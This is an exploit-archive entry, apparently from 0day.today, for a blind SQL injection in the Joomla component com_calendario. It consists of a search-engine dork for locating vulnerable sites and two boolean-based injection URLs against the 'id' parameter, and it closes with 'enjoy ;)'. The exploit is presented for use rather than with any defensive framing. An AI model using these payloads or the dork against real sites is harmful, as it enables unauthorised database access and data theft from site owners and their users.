Joomla Component com_calendario Blind SQL injection Vulnerability

2009-12-28T00:00:00
ID 1337DAY-ID-10475
Type zdt
Reporter Mr.tro0oqy
Modified 2009-12-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Joomla Component com_calendario Blind SQL injection Vulnerability
=================================================================

dork: inurl:index.php?option=com_calendario
 
 
exp :
 
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true
 
 
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false
 
 
enjoy ;)



#  0day.today [2018-04-13]  #